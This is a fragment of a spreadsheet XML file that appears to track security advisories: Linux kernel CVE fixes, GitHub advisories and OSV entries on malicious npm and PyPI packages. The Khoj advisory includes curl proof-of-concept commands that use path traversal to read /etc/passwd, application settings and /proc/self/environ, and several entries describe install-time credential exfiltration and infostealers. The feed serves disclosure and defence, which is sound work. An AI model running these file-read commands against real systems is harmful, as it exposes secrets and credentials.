      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q768" s="5" t="inlineStr"/>
      <c r="R768" s="5" t="inlineStr"/>
      <c r="S768" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
EDAC/device_sysfs: Use kstrtouint() for poll_msec to prevent truncation
The poll_msec sysfs store file uses simple_strtoul() which accepts an unsigned
long, but the target field (poll_msec) is unsigned int. On 64-bit systems,
a value &gt; UINT_MAX is silently truncated when stored.
Fix the mismatch by using kstrtouint() instead. This rejects values larger
than UINT_MAX at parse time, making truncation impossible. Also add a check
for value &lt; 1 to reject the 0-delay case, which would cause the poll work to
spin without delay and consume 100% CPU.</t>
        </is>
      </c>
      <c r="T768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98157</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98158</t>
        </is>
      </c>
      <c r="D769" s="5" t="inlineStr"/>
      <c r="E769" s="5" t="inlineStr"/>
      <c r="F769" s="5" t="inlineStr"/>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="inlineStr"/>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K769" s="5" t="inlineStr"/>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q769" s="5" t="inlineStr"/>
      <c r="R769" s="5" t="inlineStr"/>
      <c r="S769" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ppp_async: drop the errored frame instead of resetting its headroom
ppp_receive_nonmp_frame() prepends a two-byte direction tag before running
the pass/active BPF filters:
	*(__be16 *)skb_push(skb, 2) = htons(PPP_FILTER_INBOUND_TAG);
Nothing on the receive path guarantees those two bytes of headroom. The
frame-error path in ppp_async's process_input_packet() resets a reused skb's
headroom to zero while claiming to restore it to a freshly allocated state -
but a fresh skb from dev_alloc_skb() carries NET_SKB_PAD:
	err:
		if (skb) {
			/* make skb appear as freshly allocated */
			skb_trim(skb, 0);
			skb_reserve(skb, - skb_headroom(skb));
		}
ap-&gt;rpkt still points at that skb, so the next frame is reassembled into it
with no headroom at all. A peer that sends a bad-FCS frame followed by one
beginning ff 03 then leaves a single byte of headroom by the time the filter
tag is pushed, which lands one byte below skb-&gt;head:
  skbuff: skb_under_panic: len:49 put:2 head:ffff888003c10000
          data:ffff888003c0ffff tail:0x30 end:0x640 dev:&lt;NULL&gt;
  kernel BUG at net/core/skbuff.c:214!
  RIP: 0010:skb_panic+0x13e/0x230
  Call Trace:
   skb_push+0xbd/0x100
   ppp_receive_nonmp_frame+0x48a/0x1d10
   ppp_input+0x4e9/0x2f80
   ppp_async_process+0x2a/0xe0
   tasklet_action_common+0x20f/0x8a0
   handle_softirqs+0x18e/0x590
  Kernel panic - not syncing: Fatal exception in interrupt
Zeroing the headroom violates the NET_SKB_PAD guarantee that dev_alloc_skb()
gives the rest of the receive path. Besides the filter panic above, when CCP
compression is enabled ppp_decompress_frame() hands skb-&gt;data - 2 to
-&gt;decompress()/-&gt;incomp(), which then reads out of bounds before skb-&gt;head
for the same reason.
Rather than restore the headroom, drop the errored frame - as ppp_synctty
already does on its error path - and clear ap-&gt;rpkt so the next frame is
reassembled into a fresh skb with proper headroom. This is simpler and fixes
both the filter under-panic and the CCP out-of-bounds read.
The original V1 of this patch made room in ppp_receive_nonmp_frame() with
skb_cow_head(); Eric pointed out that fixing the root cause in the transport
is the right approach.
Found by fuzzing the PPP receive path with a mutating peer on a pty; it is an
interesting (remote) DoS: root configures PPP, the peer supplies two crashing
frames. The reproducer (repro-ppp-skb.c, unchanged from v1) panics in about a
second, and returns cleanly with this applied.</t>
        </is>
      </c>
      <c r="T769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98158</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98159</t>
        </is>
      </c>
      <c r="D770" s="5" t="inlineStr"/>
      <c r="E770" s="5" t="inlineStr"/>
      <c r="F770" s="5" t="inlineStr"/>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="inlineStr"/>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K770" s="5" t="inlineStr"/>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q770" s="5" t="inlineStr"/>
      <c r="R770" s="5" t="inlineStr"/>
      <c r="S770" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7921: validate CLC firmware records
The CLC region is supplied by firmware, but the loader trusts the
region count and each record length. A malformed image can make the
region table pointer precede the firmware buffer, make the record loop
fail to advance, or index phy-&gt;clc past its end. Validate the table and
record bounds before dereferencing or copying.</t>
        </is>
      </c>
      <c r="T770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98159</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98160</t>
        </is>
      </c>
      <c r="D771" s="5" t="inlineStr"/>
      <c r="E771" s="5" t="inlineStr"/>
      <c r="F771" s="5" t="inlineStr"/>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="inlineStr"/>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K771" s="5" t="inlineStr"/>
      <c r="L771" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q771" s="5" t="inlineStr"/>
      <c r="R771" s="5" t="inlineStr"/>
      <c r="S771" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: rtl8723bs: fix mismatched free of HalData in rtw_sdio_if1_init()
padapter-&gt;HalData is allocated via vzalloc(), but incorrectly freed
using kfree() in the rtw_sdio_if1_init() error path. Using kfree() to
release this vmalloc-backed buffer can lead to memory corruption.
Use rtw_hal_data_deinit() to pair the free correctly and free
HalData with vfree().
The bug was first flagged by an experimental static analysis tool we
are developing for kernel memory-management bugs. Manual inspection
confirms that the issue is still present in current mainline.
An x86_64 allyesconfig build showed no new warnings. As we do not have
suitable RTL8723BS SDIO hardware to test with, no runtime testing was
able to be performed.</t>
        </is>
      </c>
      <c r="T771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98160</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98161</t>
        </is>
      </c>
      <c r="D772" s="5" t="inlineStr"/>
      <c r="E772" s="5" t="inlineStr"/>
      <c r="F772" s="5" t="inlineStr"/>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="inlineStr"/>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr"/>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q772" s="5" t="inlineStr"/>
      <c r="R772" s="5" t="inlineStr"/>
      <c r="S772" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nvdimm: pmem: keep PREFLUSH before data writes
pmem_submit_bio() records a REQ_PREFLUSH error, but continues to copy the
bio data and can later overwrite the error with a successful REQ_FUA flush.
That lets data writes run after a failed preflush and can complete the bio
successfully despite the failed ordering barrier.
Run the REQ_PREFLUSH flush synchronously before touching the bio data and
complete the bio with the flush error if it fails. Keep asynchronous flush
chaining for REQ_FUA. At that point, data copy has completed and the parent
bio can wait for the chained flush bio.</t>
        </is>
      </c>
      <c r="T772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98161</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98162</t>
        </is>
      </c>
      <c r="D773" s="5" t="inlineStr"/>
      <c r="E773" s="5" t="inlineStr"/>
      <c r="F773" s="5" t="inlineStr"/>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="inlineStr"/>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr"/>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q773" s="5" t="inlineStr"/>
      <c r="R773" s="5" t="inlineStr"/>
      <c r="S773" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb/server: fix tree connection leak in smb2_tree_connect()
See the procedure below:
  smb2_tree_connect
    ksmbd_tree_conn_connect
      xa_store(&amp;sess-&gt;tree_conns, tree_conn-&gt;id, tree_conn)
      ksmbd_counter_inc(KSMBD_COUNTER_TREE_CONNS)
      ksmbd_share_tree_conn_inc(sc)
    ksmbd_iov_pin_rsp // fail
    status.ret = KSMBD_TREE_CONN_STATUS_NOMEM
    // do not disconnect tree_conn
Disconnect the new tree connection if ksmbd_iov_pin_rsp() fails.</t>
        </is>
      </c>
      <c r="T773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98162</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>GHSA-29h2-jr22-frmh</t>
        </is>
      </c>
      <c r="D774" s="5" t="inlineStr"/>
      <c r="E774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F774" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="inlineStr"/>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K774" s="5" t="inlineStr"/>
      <c r="L774" s="5" t="inlineStr">
        <is>
          <t>npm:@openzeppelin/confidential-contracts</t>
        </is>
      </c>
      <c r="M774" s="5" t="inlineStr">
        <is>
          <t>0.3.2, 0.4.2, 0.5.2</t>
        </is>
      </c>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P774" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q774" s="5" t="inlineStr"/>
      <c r="R774" s="5" t="inlineStr"/>
      <c r="S774" s="5" t="inlineStr">
        <is>
          <t>### Impact
Two locations consume an encrypted handle returned by an untrusted external party and use it without verifying that the party is ACL-authorized on it.
#### `VestingWalletConfidential`
Malicious users can call `release` with a malicious token. This token could return an alternative handle on `confidentialBalanceOf`, which represents the balance of the vesting wallet on an alternative ERC-7984 token (or any other handle that the vesting wallet has access to). The vesting wallet does not check that the token has ACL access and grants access to a new handle derived from the returned handle.
Effectively, this bug allows a malicious user to gain information about any private `euint64` handle that the vesting wallet has access to via a malicious ERC-7984 token. There is no loss of funds.
#### ERC7984
On a transfer with callback, `ERC7984` uses the `ebool` returned by the
recipient's `IERC7984Receiver.onConfidentialTransferReceived` to drive the refund
logic, without checking that the recipient has ACL access to it. A malicious recipient
can return any `ebool` the token has access to and recover its plaintext from the
refund result, which the token grants the caller access to. The leak is limited
to `ebool` handles (the value is only used as an `FHE.select` condition), and
there is no loss of funds.
### Patches
Both issues were fixed in the same patch releases: v0.5.2, v0.4.2, v0.3.2
- `VestingWalletConfidential`: 93e75ceed2b9648f53f9d133f431064353456805 (#423).
- `ERC7984` transfer callback: fe0863af2c9dce7614acce98720a913bf6a767a5 (#428), with follow-up ee47edf189ab681cebdad18bfb53dee541987be2 (#431) permitting an uninitialized returned handle.</t>
        </is>
      </c>
      <c r="T774" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-29h2-jr22-frmh</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>GHSA-62mm-xwmv-crhg</t>
        </is>
      </c>
      <c r="D775" s="5" t="inlineStr"/>
      <c r="E775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F775" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="inlineStr"/>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K775" s="5" t="inlineStr"/>
      <c r="L775" s="5" t="inlineStr">
        <is>
          <t>PyPI:khoj</t>
        </is>
      </c>
      <c r="M775" s="5" t="inlineStr">
        <is>
          <t>2.0.0-beta.25</t>
        </is>
      </c>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P775" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q775" s="5" t="inlineStr"/>
      <c r="R775" s="5" t="inlineStr"/>
      <c r="S775" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `/home/{file_path:path}` endpoint in `web_client.py` serves static files by directly concatenating the user-supplied `file_path` with the `home_directory` constant. There is no path traversal filtering, no path normalization check, and no authentication required. An attacker can use `../` sequences to read arbitrary files from the server filesystem.
### Details
**Vulnerable code** — `src/khoj/routers/web_client.py` lines 46-49:
```python
@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    """Serve static files from the home landing page directory"""
    return FileResponse(constants.home_directory / file_path)
```
Where `home_directory` is defined in `src/khoj/utils/constants.py` line 6:
```python
home_directory = web_directory / "home/"
```
**What is missing:**
- No `..` traversal filtering
- No path normalization/resolution check (e.g., `resolved.is_relative_to(home_directory)`)
- No authentication decorator (`@requires(["authenticated"])` is absent)
- Starlette's `FileResponse` does NOT perform path traversal protection
**Path resolution:**
```
Request: GET /home/../../../../../../../etc/passwd
file_path = "../../../../../../../etc/passwd"
home_directory / file_path = /app/src/khoj/interface/web/home/../../../../../../../etc/passwd
OS resolves to: /etc/passwd
```
### PoC
```bash
# Read /etc/passwd (no authentication required)
curl http://localhost:42110/home/../../../../../../../etc/passwd
# Read application settings (may contain SECRET_KEY, DB credentials)
curl http://localhost:42110/home/../../../../settings.py
# Read environment file
curl http://localhost:42110/home/../../../../../../../proc/self/environ
```
URL-encoded variant (may bypass some reverse proxy normalization):
```bash
curl http://localhost:42110/home/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
```
### Impact
Unauthenticated arbitrary file read. An attacker with network access to the Khoj instance can:
- **Read application configuration** — Django `SECRET_KEY`, database credentials, API keys
- **Read system files** — `/etc/passwd`, `/etc/shadow` (if permissions allow), `/proc/self/environ`
- **Exfiltrate sensitive data** — Any file readable by the server process
- **Facilitate further attacks** — Leaked credentials enable deeper compromise
**No authentication required** — the endpoint has no auth decorators, making it exploitable by any network-reachable attacker.
### Recommended fix
Use FastAPI's built-in `StaticFiles` mount instead of a custom handler, or add explicit path validation:
```python
@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    resolved = (constants.home_directory / file_path).resolve()
    if not resolved.is_relative_to(constants.home_directory.resolve()):
        raise HTTPException(status_code=404)
    return FileResponse(resolved)
```</t>
        </is>
      </c>
      <c r="T775" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-62mm-xwmv-crhg</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>GHSA-7qx8-98q7-66p4</t>
        </is>
      </c>
      <c r="D776" s="5" t="inlineStr"/>
      <c r="E776" s="5" t="inlineStr"/>
      <c r="F776" s="5" t="inlineStr"/>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="inlineStr"/>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K776" s="5" t="inlineStr"/>
      <c r="L776" s="5" t="inlineStr">
        <is>
          <t>npm:@nubjs/types</t>
        </is>
      </c>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q776" s="5" t="inlineStr"/>
      <c r="R776" s="5" t="inlineStr"/>
      <c r="S776" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (1b292cfe4598353bc8491677099fd2c056f4136eb686345bbdbe68fa887e368c)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776" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17186</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17181</t>
        </is>
      </c>
      <c r="D777" s="5" t="inlineStr"/>
      <c r="E777" s="5" t="inlineStr"/>
      <c r="F777" s="5" t="inlineStr"/>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="inlineStr"/>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K777" s="5" t="inlineStr"/>
      <c r="L777" s="5" t="inlineStr">
        <is>
          <t>PyPI:reqparser</t>
        </is>
      </c>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q777" s="5" t="inlineStr"/>
      <c r="R777" s="5" t="inlineStr"/>
      <c r="S777" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (982923c14e644e82a839621d37715fd123568fc378aed45b6afa6247bc0b5054)
During the module import, the package starts an infostealer. It exfiltrates data from crypto currency wallets and web browsers, ensures persistence and installs further malware.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-reqparser
Reasons (based on the campaign):
 - malware
 - persistence
 - exfiltration-crypto
 - exfiltration-browser-data
 - The package contains code to detect if it is running in a sandbox environment.
 - infostealer
 - keylogger
</t>
        </is>
      </c>
      <c r="T777" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17181</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17182</t>
        </is>
      </c>
      <c r="D778" s="5" t="inlineStr"/>
      <c r="E778" s="5" t="inlineStr"/>
      <c r="F778" s="5" t="inlineStr"/>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="inlineStr"/>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K778" s="5" t="inlineStr"/>
      <c r="L778" s="5" t="inlineStr">
        <is>
          <t>npm:app-sca-info-banking</t>
        </is>
      </c>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q778" s="5" t="inlineStr"/>
      <c r="R778" s="5" t="inlineStr"/>
      <c r="S778" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9733b1d7500efca385ba6dc866f4ef1b04e0d1cd4ead564b9445551a2d72a51b)
package.json declares scripts.postinstall: `node poc.js`, causing poc.js to execute automatically on npm install. poc.js issues DNS (dns.resolve4) and HTTP (http.get) callbacks to unique subdomains under ki6rmdjnq5q8y7v8soxc080fz65ytohd.oastify.com (a Burp Suite Collaborator / OAST host) and writes a marker file under os.tmpdir(). The package's main entry is an empty stub (module.exports = {}); the postinstall payload is the package's only functionality. The DNS/HTTP callbacks to an attacker-controlled OAST domain confirm arbitrary code execution on the installer's host and leak install-event metadata to a third-party endpoint.
## Source: ossf-package-analysis (3f5e6f43a1552d09c016e2db6c287a1972a70df70fa7a42d3049840d04580bd4)
The OpenSSF Package Analysis project identified 'app-sca-info-banking' @ 0.0.24 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="T778" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17182</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17183</t>
        </is>
      </c>
      <c r="D779" s="5" t="inlineStr"/>
      <c r="E779" s="5" t="inlineStr"/>
      <c r="F779" s="5" t="inlineStr"/>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="inlineStr"/>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr">
        <is>
          <t>pypi, go</t>
        </is>
      </c>
      <c r="K779" s="5" t="inlineStr"/>
      <c r="L779" s="5" t="inlineStr">
        <is>
          <t>PyPI:tego-managed-agents-test</t>
        </is>
      </c>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q779" s="5" t="inlineStr"/>
      <c r="R779" s="5" t="inlineStr"/>
      <c r="S779" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (72c8a01de8d706d83a4b80b845099c11602ba778a392337cad2d9a8a40090b5d)
The package's custom install command serializes the entire process environment (dict(os.environ)) to JSON and POSTs it to the hardcoded endpoint https://gateway.tego.security during `pip install`. The exfiltration runs automatically as part of the install lifecycle without user consent, and exceptions are silently swallowed so no error is surfaced to the installer. Because process environments on developer and CI hosts routinely contain credentials (AWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, NPM_TOKEN, database passwords, and other secret-shaped variables), this indiscriminate bulk-environment upload is a credential-harvesting exfiltration path from installer to a remote author-controlled host.
## Source: kam193 (b09488c67894dd74d043a240308c694f0e42464e3a4f371b8d5ebc8a6a589d7b)
During installation, the code exfiltrates all environment variables to a remote location.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-tego-managed-agents-test
Reasons (based on the campaign):
 - exfiltration-env-variables
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="T779" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17183</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17184</t>
        </is>
      </c>
      <c r="D780" s="5" t="inlineStr"/>
      <c r="E780" s="5" t="inlineStr"/>
      <c r="F780" s="5" t="inlineStr"/>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="inlineStr"/>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr">
        <is>
          <t>npm, typescript</t>
        </is>
      </c>
      <c r="K780" s="5" t="inlineStr"/>
      <c r="L780" s="5" t="inlineStr">
        <is>
          <t>npm:@airbnb-extended/typescript-config</t>
        </is>
      </c>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q780" s="5" t="inlineStr"/>
      <c r="R780" s="5" t="inlineStr"/>
      <c r="S780" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8424e4bf8731b950511535a2cb9b41b0bedba02092a73ea304b6730f04aa95fe)
